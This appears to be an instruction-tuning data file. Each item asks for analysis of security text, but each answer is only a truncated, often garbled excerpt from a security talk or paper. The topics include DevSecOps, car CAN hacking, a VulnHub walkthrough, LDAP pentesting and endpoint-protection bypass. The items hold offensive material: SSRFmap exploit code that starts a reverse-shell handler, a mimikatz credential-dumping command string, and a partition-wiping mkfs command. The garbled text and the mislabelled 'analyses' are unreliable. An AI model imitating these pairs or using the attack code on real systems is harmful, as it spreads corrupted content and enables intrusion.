{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDevSecOps标准解读 中国信通院云大所 牛晓玲 牛晓玲 中国信息通信研究院 云计算与大数据研究所 云计算部 副主任 DevOps标准工作组组长DevOps 国际标准编辑人长期从事云计 算领域开发运维研究的相关工作包括云服务业务功能测试以及运维 管理系统审查等相关工作参与编写云计算服务协议参考框架 对象存储云数据库研发运营一体化DevOps能力 成熟度模型系列标准云计算运维智能化通用评估方法等多项 标准20余项参与多篇白皮书调查报告等编制工作包括企业IT 运维发展白皮书中国DevOps现状调查报告2019年等 参与评估DevOps能力成熟度评估超过40个项目具有丰富的标准编 制及评估测试经验 Ø DevOps的定义开发Dev和运维Ops的缩写是一组过程方法与系统的统称强调 业务人员及IT专业人员开发测试运维等在应用和服务生命周期中的协作和沟通强调整个组织的 合作以及交付和基础设施变更的自动化从而实现持续集成持续部署和持续交付等的无缝集成 Ø DevSecOps的定义是将信息安全的框架整合到DevOps的工作流程中研发运营测试安全多个部门 紧密协作在提升开发和运营敏捷性的同时也保障了数据和服务的可用性与安全性 什么是DevSecOps 安全 概念 DevSecOps概念示意图 DevSecOps的由来 2012 Gartner的报告中首次提出了 DevOpsSec这个概念 2012年 2017 在RSA年度大会上DevSecOps成为 了热门词汇 它是一种对DevOps的延 展DevSecOps提出安全是每个人的责 任 2017年 2017-至今 DevOps的落地实践带动了DevSecOps的兴 起强调将信息安全的能力整合到DevOps 的工作流程中各部门重视安全提升开 发和运营敏捷性 至今 >>传统开发模式中安全介入较晚且安全部门独立于 软件开发运维部门 关于DevSecOps的几点理解 Ø 是一种安全的文化的渗透 Ø 是制度流程和工具的集合 Ø 是将安全性和合规性纳入软 件全生命周期的方法 Ø 是由学习和实践驱动的战略 Yes Ø 不是一种一刀切的全能方法 Ø 不是单一工具或方法 Ø 不单是在持续交付中增加安 全性的手段 Ø 不是追求完美与合规的战略 No 部署应用程序的能力在规模和速度上都得到了改善但安全方面的考虑却常常被忽略 更倾向于快速满足业务需求 依靠应用程序来保持操作运行开发过程中的安全性是上线的最后阶段执行应用程 序安全性必须加快以跟上软件开发的步伐 DevSecOps生命周期 定义研发安全指标进行威胁 建模安全工具培训等 计划阶段 IDE安全插件方式实现 编码阶段 在软件开发阶段消除这些漏洞可以降 低企业的信息安全风险包括 SAST/DAST/IAST,SCA 验证测试阶段 签名验证完整性校验和纵深 防御 配置阶段 RASPUEBA网络监控和渗 透测试 检测阶段 安全编排基于RASP / WAF的 安全防护混淆 响应阶段 DevSecOps的主要特征是通过在软件生命周期的各个阶段进行自动化监控和应用安全性来提高客 户成果和使命价值包括计划开发构建测试发布交付部署操作和监控等阶段 准生产环境 混沌工程模糊测试和集成测 试 发布阶段 软件签名传输等过程中防篡 改 预测阶段 相关的脆弱性分析 IOC情报 STIXTAXII 优化 阶段 Dev Ops Sec 解决安全技术债事件响应纵 深防御体系等不断适配调整和 优化 Release Detect Gartner 标准背景说明 Ø 牵头单位工信部 中国信息通信研究院国家智库可信云等出品单位 Ø 起草单位中国信息通信研究院云计算开源产业联盟 DevOps时代社区高效运维社区BATJ中国银行招商银行平安科技中国移动中国联 通和华为等 Ø 目前进展工信部和联合国 ITU-T 立项在研2018年6月29日发布全量征求意见稿 整 体 级 别 说 明 安 全 风 险 管 理 标 准 安全及风险管理标准框架 控制总 体风险 组织建设和 人员管理 安全工具链 基础设施 管理 第三方 管理 度量与 反馈改进 数据管理 控制开发过程风险 需求管理 设计管理 开发过程管理 控制交付过程风险 配置管理 构建管理 测试管理 部署与发布管理 控制运营过程风险 安全监控 运营安全 应急响应 运营反馈 研发运营一体化DevOps能力成熟度模型 第6部分安全及风险管理 研发运营一体化DevOps能力成熟度模型 第6部分安全及风险管理标准是一种全新的安全理念与模式强调安全是每 个人的责任指将安全内嵌到应用的全生命周期在安全风险可控的前提下帮助企业提升IT效能更好地实现研发运营一体化 框架划分依据DevOps全生命周期分为控制总体风险控制开发过程风险控制交付过程风险和控制运营过程风险四大部分 人人为", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T Wiki 云安全知识文库 [![GitHub stars](https://img.shields.io/github/stars/teamssix/twiki)](https://github.com/teamssix/twiki) [![](https://img.shields.io/badge/T%20Wiki%20-%E4%BA%91%E5%AE%89%E5%85%A8%E7%9F%A5%E8%AF%86%E6%96%87%E5%BA%93-blue)](https://wiki.teamssix.com/) [![](https://img.shields.io/badge/%E7%8B%BC%E7%BB%84%E5%AE%89%E5%85%A8%E5%9B%A2%E9%98%9F-%E7%9F%A5%E8%AF%86%E6%96%87%E5%BA%93-blue)](https://wiki.wgpsec.org/) [![](https://img.shields.io/badge/PeiQi-%E7%9F%A5%E8%AF%86%E6%96%87%E5%BA%93-blue)](http://wiki.peiqi.tech/) [![Twitter](https://img.shields.io/twitter/follow/teamssix?label=Followers&style=social)](https://twitter.com/teamssix) [![img](https://img.shields.io/github/followers/TeamsSix?style=social)](https://github.com/teamssix) ## 前言 `T Wiki` 是一个面向云安全方向的知识库这一点是和其他文库最大的不同也许这是国内第一个云安全知识文库 搭建这个文库的起因是笔者发现在云安全方向的中文资料属实不多少有的这些资料也很散乱于是搭建了这个文库 文库的地址为[wiki.teamssix.com](https://wiki.teamssix.com/) ## 本地部署 ### Docker 部署推荐 ```bash docker pull teamssix/twiki:main docker run --name twiki -d -p 7777:80 teamssix/twiki:main ``` 然后直接访问本地 IP 的 7777 端口即可 ### 手动部署 > 需要本地先安装 node 且版本需要大于或等于 12 ```bash git clone https://github.com/teamssix/TWiki.git --depth 1 cd TWiki npm install --global yarn yarn install yarn docs:build ``` build 完之后将 docs/.vuepress/dist 目录下的文件复制到你的 nginx 或者 apache 服务的网站根目录下即可 ## 感谢以下为 T Wiki 文库贡献的师傅们 :confetti_ball: <table> <tr> <td align=\"center\"><img alt=\"TeamsSix\" src=\"./docs/.vuepress/public/img/1651741861.png\" style=\"width: 100px;\"/><br />TeamsSix</td> <td align=\"center\"><img alt=\"1derian\" src=\"./docs/.vuepress/public/img/1650108029.png\" style=\"width: 100px;\" /><br />1derian</td> <td align=\"center\"><img alt=\"ShangRui-hash\" src=\"./docs/.vuepress/public/img/1650108092.png\" style=\"width: 100px;\" /><br />ShangRui-hash</td> <td align=\"center\"><img alt=\"半人间丶\" src=\"./docs/.vuepress/public/img/1650108207.png\" style=\"width: 100px;\" /><br />半人间丶</td> <td align=\"center\"><img alt=\"UzJu\" src=\"./docs/.vuepress/public/img/1650253985.png\" style=\"width: 100px;\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nComputer Science / www.isec.utulsa.edu How to Hack Your Mini Cooper: Reverse Engineering CAN Messages on Passenger Automobiles Jason Staggs Computer Science / www.isec.utulsa.edu Who is this guy?  Jason Staggs  Graduate Research Assistant  Institute for Information Security (iSec)  Crash Reconstruction Research Consortium (TU-CRRC)  TRUE Digital Security  Cyber Security Analyst Computer Science / www.isec.utulsa.edu Why do we hack cars?  Related work  Comprehensive Experimental Analyses of Automotive Attack Surfaces  Experimental Security Analysis of a Modern Automobile  Understanding computer and network systems on cars  Underlying CAN protocol and components lack of authentication and verification of messages  Understanding potential points of vulnerability  Vehicle network security is in its infancy  But most importantly Computer Science / www.isec.utulsa.edu To prevent this.. Computer Science / www.isec.utulsa.edu From turning into this.. Computer Science / www.isec.utulsa.edu Because of this.. Computer Science / www.isec.utulsa.edu CAN Clock Project  Research project developed as a proof of concept  Manipulating CAN nodes via CAN network  Reverse Engineering CAN messages  2003 Mini Cooper Computer Science / www.isec.utulsa.edu Background of vehicle communication networks  Began in 1980s with General Motors  Common vehicle Protocols  CAN (Most widely used among manufactures)  FlexRay  KW2000  LIN  J1850 (GM/Chrysler)  J1939 (Heavy Trucks)  J1708/J1587 (Being phased out due to J1939)  2008: All US cars use CAN for mandated EPA diag. Computer Science / www.isec.utulsa.edu Controller Area Networks  Bosh CAN standard  Developed in the 80s  European Manufactures were early adopters  Standard Format  11-bit ID header  Mfg. use of proprietary IDs for each of their CAN components  Extended Format  29-bit ID header  Used extensively by J1939 Computer Science / www.isec.utulsa.edu CAN Frame  SOF  Start of Frame  Identifier  Unique identifier for message along with priorit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Crazy Circuit Conundrum, re, 161p > We are trying to break into their safe storage. We have exposed the panel of the lock mechanism and revealed a circuit. Go to the organizers table and see if you can unlock the entry to the storage. Organizers supplied us with a circuit board. It had 16 DIP switches, some discrete logic chips, and a few LEDs. Apparently after finding right combination, the light would switch on. We took a photo of both sides of the board, aligned them in GIMP, then manually traced and named each signal. ![](IMG_20180616_155539.jpg) ![](IMG_20180616_155556.jpg) ![](circuit.jpg)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nssrfmap包含了ssrf的部分法于是看了下ssrfmap的代码和检测的法再结合些ssrf的trick想着能不能 弄个动化检测ssrf+利的具 SSRF基础知识 ssrf出现最根本的原因就是服务端使了络函数般编程语络函数底层调的都是 curl (当然这个 要看具体的函数代码以及底层逻辑)curl持很多协议所以ssrf就可以使这些协议 curl 是个开源的于数据传输的命令具与库它使 URL 语法格式持众多传输协议包括 HTTPHTTPSFTPFTPSGOPHERTFTPSCPSFTPSMBTELNETDICTLDAPLDAPS FILEIMAPSMTPPOP3RTSP和RTMP 般可以利的协议有 file unc gopher dict http https php需要注意的是 1. file_get_contents的gopher协议不能 UrlEncode 2. file_get_contents关于Gopher的302跳转有bug导致利失败 3. curl/libcurl 7.43上gopher协议存在bug截断7.45以上此bug 4. curl_exec()默认不跟踪跳转 5. file_get_contents() 持php://input协议 java持  httphttpsfileftpmailtojarnetdoc Ssrfmap ssrfmap的github是 https://github.com/swisskyrepo/SSRFmap 它的代码结构挺简单的 核就是加载这个ssrf类代码较少就直接贴出来好好学习下 from core.requester import Requester from core.handler import Handler from importlib.machinery import SourceFileLoader import os import time import logging class SSRF(object): modules = set() handler = None requester = None def __init__(self, args): # 加载内置模块函数在下 self.load_modules() # 启动反连的shell if args.handler and args.lport and args.handler == \"1\": handler = Handler(args.lport) handler.start() elif args.handler and args.lport: self.load_handler(args.handler) handler = self.handler.exploit(args.lport) handler.start() self.requester = Requester(args.reqfile, args.useragent, args.ssl) # NOTE: if args.param == None, target everything if args.param == None: logging.warning(\"No parameter (-p) defined, nothing will be tested!\") # NOTE: if args.modules == None, try everything if args.modules == None: logging.warning(\"No modules (-m) defined, everything will be tested!\") for module in self.modules: module.exploit(self.requester, args) else: for modname in args.modules.split(','): for module in self.modules: if module.name == modname: module.exploit(self.requester, args) break # Handling a shell while args.handler: handler.listen_command() time.sleep(5) def load_modules(self): for index,name in enumerate(os.listdir(\"./modules\")): location = os.path.join(\"./modules\", name) if \".py\" in location: mymodule = Sourc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHIGH-DEF FUZZING EXPLORING VULNERABILITIES IN HDMI-CEC name = \"Joshua Smith\" job = \"Senior Security Researcher\" job += \"HP Zero Day Initiative\" irc = \"kernelsmith\" twit = \"@kernelsmith\" Which of the following is false? 1. Have had 10 knee surgeries... and 5 others 2. Worked at JHUAPL... did mostly weapon sys assessments 3. Was voted \"most athletic\" in high school... don't judge a book by its cover ;) 4. Previously ran assessments at the 92d Info. Warfare Aggressor Sq. (USAF)... now 92d Info. Ops. Sq - vuln assessments/pentests/red teams 5. Have a B.S. in Computer Engineering from RPI... Aeronautical. Also, an MIS & some CS from JHU 6. Am an external Metasploit dev... since Feb 2013 7. Had C2 of 50 nuclear ICBMs on 9/11... interesting story Overview What is CEC Specs & Implementations Design Details Protocol Attack Vectors & Surface Fuzzing CEC Some Results Future Work Why? Wanted to research an area that was relatively untouched For me: assembly > C/C++ and RISC > CISC Another attack vector for mobile devices via: Mobile High-Definition Link (MHL) Slimport Many car stereos as well My son is completely obsessed with cords/wires, esp HDMI Previous Research HDMI  Hacking Displays Made Interesting Andy Davis BlackHat EU 2012 GUI Python CEC fuzzer Somewhat simplistic No exception monitoring No crash data gathering What is HDMI? High Def Multimedia Interface HDMI is an interface specification Implemented as cables & connectors Successor to DVI What is CEC? Consumer Electronics Control Feature defined in the HDMI spec Allows user to command & control up to 15 devices Can relay commands from remotes It's what automatically changes your TV input Vendor-extendable Adopted by some other technologies That Don't Look Like HDMI! Still has CEC however Slimport Think ~ Amazon, Google, Blackberry, LG G+ Mobile High-Definition Link (MHL) Think ~ HTC, LG Optimus+, Samsung (not G6) Remote Control Protocol Specs & Features History Ver Published Features 1.0 Dec 2002 Boring stuff 1.1 May", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n如何仅使用 curl 利用 LDAP 协议进行 Windows 域的渗透测试 1简介 Lightweight Directory Access ProtocolLDAP轻量级目录访问协议基于 X.500 标准 那么好X.500 标准是什么 X.500 基本上是用来查询有关人员的信息如邮政地址电话号码电子邮件地址等 的一种服务可以有所在机构的部门名称以及国家名称X.500 目录服务是一种用于开发 一个单位或组织内部人员电子目录的标准方法这个目录可以成为全球目录的一部分 世界上的任何人都可以访问因特网查询到该目录这个目录有时称全球用户信息数据库目 录其思路为以用户界面友好的方式通过人名部门单位来找人许多公司和组织都建立 了 X.500 目录这个目录组织在同一个\"根\"目录下具有一个\"树\"型结构包括国家单 位部门和个人两个知名的 X.500 目录也是最大的 X.500 目录它们是用于管理域名 注册的 InterNIC 和存储全美国家实验室的 Esnet百度百科 既然 LDAP 是基于 X.500 标准的协议自然就继承了它的一些优点分散维护强大搜索 性能 再来谈一谈什么是 Windows 域 自从 Windows 操作系统被创造它就越来越广泛的应用于商业领域同时也是全球使用最 广泛的操作系统企业也会首选 Windows 提供给员工进行日常办公在企业中每个员工 的职能和权限是不一样的所以每个员工能访问到的资源与生产资料也是不同的这就需要 有一种方法可以在办公网络中实现这种权限分配 上面说到了 X.500 标准X.500 标准这种目录组织的格式十分符合企业内部的职能分配 更贴近现实世界中的人员职能体系但 X.500 标准也有一些缺点实施太过于复杂 具体是什么复杂的问题是历史的问题与本文无关我们只需要知道后来发生的事情 由于 X.500 的实施太过于复杂而受到批评为解决这个问题密歇根州Michigan大 学推出了一种较为简单的基于 TCP/IP 的 DAP 新版本即轻量级目录访问协议 LDAP Lightweight Directory Access Protocol主要用于因特网 LDAP 与 DAP 具有很多类似的 基本功能另外它还能用来查询私有目录和开放 X.500 目录 上的数据在过去的几年里 大多数主要的电子邮件和目录服务软件供应商都对 LDAP 表现出了极大的兴趣LDAP 已 迅速发展成为因特网上事实的目录协议标准百度百科 于是微软便就采用了更为简单的轻量级目录访问协议LDAP基于 LDAP 协议创造了 Windows 的活动目录Active Directory用于储存现实世界中计算机用户的职能分布具 体存储着每个用户的用户名密码等信息并将该活动目录数据存储在域控制服务器上默 认是 Ntds.dit 文件并将每个办公系统的首选 DNS 服务器配置设置为一个指定的运行着 DNS 服务的系统该 DNS 会提供一个根域名与活动目录中的根结点名一致且该 DNS 服务与活动目录联动同步存储每个加入活动目录的系统包括域控制服务器系统提供 解析服务通过向该 DNS 服务请求便可以定位加入该活动目录的每台主机的 IP每个用 户在首次加入了活动目录的操作系统上登陆时认证请求都会通过 DNS 服务定位到域控制 服务器上的活动目录使用 LDAP 协议在域控制服务器的 389 端口上进行身份认证实现 登录Windows 使用这些流程将各个系统组成一个网络这样便构成了 Windows 域然 而还有很多的细节没有提到介绍的仍不够完全 2AD 域的 LDAP 数据属性 我们这里使用 Ldifde 工具导出一台域控制服务器中的 LDAP 数据进行分析 可以看到 LDAP 数据中有很多对渗透测试有帮助的属性 dn结点路径 name结点名 memberOf说明该结点是哪个结点的成员 lastLogon上一次登陆时间 关于结点路径可以将 LDAP 数据比作一棵树DC 为根结点OU 为路径CN 为叶子节 点且每个结点都可以存储信息 例如 dn: CN=Administrators,CN=Builtin,DC=test,DC=local dn: CN=WIN-1AA3VOP20U1,OU=Domain Controllers,DC=test,DC=local dn: CN=Domain Admins,CN=Users,DC=test,DC=local 3curl 请求 LDAP 很多情况下我们可能在一个条件很苛刻的内网 Linux Shell 上执行命令例如基于 CVE- 2019-19781 得到的 Citrix Application Delivery ControllerNetScaler ADC和 Citrix NetScaler Gateway 设备上的 Lin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPEBTEB详解 PEB PEB中文名为进程环境块里面存储了像映像加载程序堆管理器以及其他windows组件需要从用户 模式访问的信息在介绍PEB之前我们先来看一下进程内部的结构以此来更好的了解PEB 每个windows进程都可以用一种执行体进程(EPROCESS)进程来表示EPROCESS及其大部分相关数据 结构都位于系统地址空间中唯一的例外就是PEB它位于用户地址空间中对于每个执行了的 windows程序的进程windows子系统进程(Csrss)维护了名为CSR_PROCESS的平行结构另外 windows子系统(win32k.sys)的内核模式部分还为每个进程维护了名为W32PROCESS的数据结构这是 现成首次调用windows并在内核模式中实现USER或GUI函数时创建的该操作会在加载User32.dll库时 执行一般加载该库的函数为CreateWindow和GetMessage 执行体进程结构的第一个成员名为进程控制块(PCB),这是一种KPROCESS结构其中的分发器调度 器中断时间等使用了KPROCESS 查看EPROCESS结构 在windbg中我们可以使用下面的命令来查看其结构 得到 dt nt!_eprocess lkd> dt nt!_eprocess +0x000 Pcb : _KPROCESS +0x438 ProcessLock : _EX_PUSH_LOCK +0x440 UniqueProcessId : Ptr64 Void +0x448 ActiveProcessLinks : _LIST_ENTRY +0x458 RundownProtect : _EX_RUNDOWN_REF +0x460 Flags2 : Uint4B +0x460 JobNotReallyActive : Pos 0, 1 Bit +0x460 AccountingFolded : Pos 1, 1 Bit +0x460 NewProcessReported : Pos 2, 1 Bit +0x460 ExitProcessReported : Pos 3, 1 Bit +0x460 ReportCommitChanges : Pos 4, 1 Bit +0x460 LastReportMemory : Pos 5, 1 Bit +0x460 ForceWakeCharge : Pos 6, 1 Bit +0x460 CrossSessionCreate : Pos 7, 1 Bit +0x460 NeedsHandleRundown : Pos 8, 1 Bit +0x460 RefTraceEnabled : Pos 9, 1 Bit +0x460 PicoCreated : Pos 10, 1 Bit +0x460 EmptyJobEvaluated : Pos 11, 1 Bit +0x460 DefaultPagePriority : Pos 12, 3 Bits +0x460 PrimaryTokenFrozen : Pos 15, 1 Bit +0x460 ProcessVerifierTarget : Pos 16, 1 Bit +0x460 RestrictSetThreadContext : Pos 17, 1 Bit +0x460 AffinityPermanent : Pos 18, 1 Bit +0x460 AffinityUpdateEnable : Pos 19, 1 Bit +0x460 PropagateNode : Pos 20, 1 Bit +0x460 ExplicitAffinity : Pos 21, 1 Bit +0x460 ProcessExecutionState : Pos 22, 2 Bits +0x460 EnableReadVmLogging : Pos 24, 1 Bit +0x460 EnableWriteVmLogging : Pos 25, 1 Bit +0x460 FatalAccessTerminationRequested : Pos 26, 1 Bit +0x460 DisableSystemAllowedCpuSet : Pos 27, 1 Bit +0x460 ProcessStateChangeRequest : Pos 28, 2 Bits +0x460 ProcessStateChangeInProgress : Pos 30, 1 Bit +0x460 InPrivate : Pos 31, 1 Bit +0x464 Flags : Uint4B +0x464 CreateReported : Pos 0, 1 Bit +0x4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking OpenVMS Claes Nyberg Christer Öberg James Tusini Some facts about OpenVMS An Operating system with the following feature Multi-user / Multi-processing Virtual memory Real time processing Transaction processing History of ownership DIGITAL (1978  1998) COMPAQ (1998  2001) HP (2001 - Today) Some facts about OpenVMS VAX/VMS, VMS, OpenVMS VMS is not UNIX, Windows NT is VMS? Runs on: VAX Alpha Itanium Secure and reliable  more than OSX :) 5 Good reasons to hack OpenVMS Nobody attack VMS systems anymore Runs critical operations Financial systems (banks, stock exchanges) Infrastructure system (railways, electric) Healthcare (NHS, NBS, VA) Manufacturing (Intel) Education Many more.. 5 Good reasons to hack OpenVMS Certified by DoD for its security Challenging Fun Play with it online at deathrow.vistech.net Access to both Alpha and VAX systems Encourages security research Small decnet fafnet.dyndns.org VAX only testdrive.hp.com Access to Itanium Getting your own system Software Hobbyist program  openvmshobbyist.com $30 + local group subscription $100 (UK) Emulators Personal Alpha (emulatorsinternational.com) Free version available With limited functionality Runs on Windows only Getting your own system Emulators Charon Emulates VAX systems Demo version available But only runs on OpenVMS/Itanium Simh Emulates VAX Free Runs on most OS Size does matter... User Environment X CDE DCL  Digital Command Language Default shell / scripting language Case insensitive Requires commands to be defined explicitly CDL (command definition language Foreign commands OpenVMS Security Incidents Worms WANK / Father Christmas Propagated through DECnet Relied on weak passwords Not technically advanced compared to Morris Vulnerabilities most reports are pre-1993 Limited disclosure (CERT) Textfiles.com is probably the best source for vuln details OpenVMS Security OpenVMS Survived Defcon9 CTF Something their users seems immensely proud of.. fine grained controls You don't need root for everything", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# RICKDICULOUSLYEASY: 1 > https://download.vulnhub.com/rickdiculouslyeasy/RickdiculouslyEasy.zip 靶场IP`192.168.32.12` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -sV -p1-65535 192.168.32.12 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 04:54 EDT Nmap scan report for 192.168.32.12 Host is up (0.00018s latency). Not shown: 65528 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.27 ((Fedora)) 9090/tcp open http Cockpit web service 161 or earlier 13337/tcp open unknown 22222/tcp open ssh OpenSSH 7.5 (protocol 2.0) 60000/tcp open unknown 3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port22-TCP:V=7.92%I=7%D=9/8%Time=6319ADC4%P=x86_64-pc-linux-gnu%r(NULL, SF:42,\"Welcome\\x20to\\x20Ubuntu\\x2014\\.04\\.5\\x20LTS\\x20\\(GNU/Linux\\x204\\.4\\ SF:.0-31-generic\\x20x86_64\\)\\n\"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port13337-TCP:V=7.92%I=7%D=9/8%Time=6319ADC4%P=x86_64-pc-linux-gnu%r(NU SF:LL,29,\"FLAG:{TheyFoundMyBackDoorMorty}-10Points\\n\"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port60000-TCP:V=7.92%I=7%D=9/8%Time=6319ADCA%P=x86_64-pc-linux-gnu%r(NU SF:LL,2F,\"Welcome\\x20to\\x20Ricks\\x20half\\x20baked\\x20reverse\\x20shell\\.\\.\\ SF:.\\n#\\x20\")%r(ibm-db2,2F,\"Welcome\\x20to\\x20Ricks\\x20half\\x20baked\\x20rev SF:erse\\x20shell\\.\\.\\.\\n#\\x20\"); MAC Address: 08:00:27:73:25:78 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.88 seconds ``` FTP匿名登录 ``` (rootkali)-[/tmp] # ftp 192.168.32.12 Connected to 192.168.32.12. 220 (vsFTPd 3.0.3) Name (192.168.32.12:ro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEMET 4.0 PKI MITIGATION Neil Sikka DefCon 21 ABOUT ME  Security Engineer on MSRC (Microsoft Security Response Center)  I look at 0Days  EMET Developer  I enjoy doing security research on my free time too: http://neilscomputerblog.blogspot.com/  Twitter: @neilsikka OVERVIEW 1. What Is EMET? 2. New Features in EMET 4.0 3. EMET Architecture 4. PKI Feature In Depth 5. PKI Demo WHAT IS EMET?  Mitigates various exploitation techniques  Not signature basedbehavior based  Things like stopping shellcode from reading Export Address Table etc  DLLs dynamically loaded at runtime  No application recompiling/redeploying necessary  Can help mitigate 0Days  Works on all supported Windows Platforms on x86/amd64  Giving back to the security community  Its Free COMPATIBLE APPLICATIONS The logos and products mentioned herein may be the trademarks of their respective owners. CHANGES BETWEEN EMET 3.0/4.0  We added Certificate Trust (PKI) Mitigations   Our first non memory corruption mitigation  ROP Mitigation  Some ROP Hardening (Deep Hooks, Antidetours, Banned Functions)  New GUI EXPLOIT MITIGATIONS  DEP  Call SetProcessDEPPolicy  HeapSpray  Reserve locations used by heap sprays  Mandatory ASLR  Reserve module preferred base address, causing loader to load module somewhere else  NullPage  Reserve first memory page in process, defense in depth  EAF  Filter shellcode access to Export Address Table (kernel32 and ntdll)  BottomUp Randomization  Randomize data structure bases MORE EXPLOIT MITIGATIONS  SEHOP-validate SEH chain looking for _EXCEPTION_REGISTRATION structure whose prev pointer is -1  ROP Hardening (new in 4.0)  Deep Hooks-protect critical APIs and the APIs they call  AntiDetours-protect against jumping over detoured part of a function  Banned Functions-disallow calling ntdll!LdrHotpatchRoutine ROP  Stands for Return Oriented Programming  Bypasses DEP (Data Execution Prevention)  Attacker call stack injected into user controlled portion of memory  Attacker stack has return pointe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nI I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I I cd cd /home/ /home/tjmunn tjmunn/.loop /.loop I I insmod insmod -f loop.o -f loop.o I I mount / mount /dev dev/sda3 /.keys /sda3 /.keys I I #created #created symlink symlink from . from .gnupg gnupg in root's in root's directory to external disk link directory to external disk link I I cd cd /root/. /root/.gnupg gnupg I I gpg gpg --decrypt < --decrypt < keyfile keyfile..asc asc | mount -p | mount -p 0 -t ext3 / 0 -t ext3 /dev dev/sda2 /home -o /sda2 /home -o loop=/ loop=/dev dev/loop0,encryption=AES192 /loop0,encryption=AES192 I I This is covered in the This is covered in the readme readme!!! !!! I I head -c 45 / head -c 45 /dev dev/random | uuencode -m - /random | uuencode -m - | head -2 | tail -1 | | head -2 | tail -1 | gpg gpg -e -a -r -e -a -r Email/ Email/userid userid of key!\" > of key!\" > keyfile keyfile..asc asc I I gpg gpg --decrypt < --decrypt < keyfile keyfile..asc asc||losetup losetup -p -p 0 -e AES192 / 0 -e AES192 /dev dev/loop3 / /loop3 /dev dev/sda3 /sda3 (partition to destroy!) (partition to destroy!) I I mkfs mkfs -t -j ext2 / -t -j ext2 /dev dev/loop3 /loop3 I I losetup losetup -d / -d /dev dev/loop3 /loop3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLeave your malware @home MALPROXY Amit Waisel Hila Cohen US About Amit Waisel Offensive Cyber Security Expert Technology lead, Security Research @ XM Cyber Trusted Security Advisor Favorite bit: 1 Private Pilot , Skipper and cat lover Hila Cohen Security Researcher @ XM Cyber @hilaco10 Passionate about Windows Internals and Malware Analysis Love to dance, travel the world and capture moments with my camera Endpoint protections introduction Malproxy - A new technique to bypass endpoint protections Demo Mitigations TL;DR & Organizations heavily rely on endpoint protection solutions in their security stack Unfair cat-and-mouse game Security solutions evolved over time, so are the viruses What do you know about your endpoint protection solutions? malicious activity detection mechanisms Endpoint Protection 101 Static signatures Behavioral signatures 1 3 Heuristics 2 Static signatures 1 Behavioral signatures Heuristics 2 3 //testbin.c int main () { char *user = \"adm.user\"; printf(\"%s\\n\",user); return 0; } Static signatures 1 Behavioral signatures Heuristics 2 3 rule APT_adm_corp : apt //apt is just a tag, it doesnt affect the rule. { meta: //Metadata, they dont affect the rule author = \"xgusix\" strings: $adm = \"adm.\" $corp = \"corp.\" $elf = { 7f 45 4c 46 } //ELF files magic numbers condition: $elf in (0..4) and ($adm or $corp) // If $elf in the first 4 bytes and it matches $adm or $corp } Static signatures 1 Behavioral signatures Heuristics 2 3 # yara -s -m -g rules.yar testbin APT_adm_corp [apt] [author=\"xgusix\"] testbin 0x0:$elf: 7F 45 4C 46 0x4c0:$adm: adm. Static signatures 1 Behavioral signatures Heuristics 2 3 HackTool:Win32/OurCoolMimikatzSignature: \"A La Vie, A L'Amour\" - (oe.eo) Benjamin DELPY `gentilkiwi` Vincent LE TOUX ## / \\ ## sekurlsa logonpasswords Static signatures 1 Heuristics 2 Behavioral signatures 3 UPX2 .data .text Property 0x00003400 0x00000400 0x00000400 Raw-address 0x200 bytes 0x3000 bytes 0x0 bytes Raw-size 0x0040A000 0x00407000 0x00401000 Virtual", "category": "text_analysis", "source": "security_papers"}
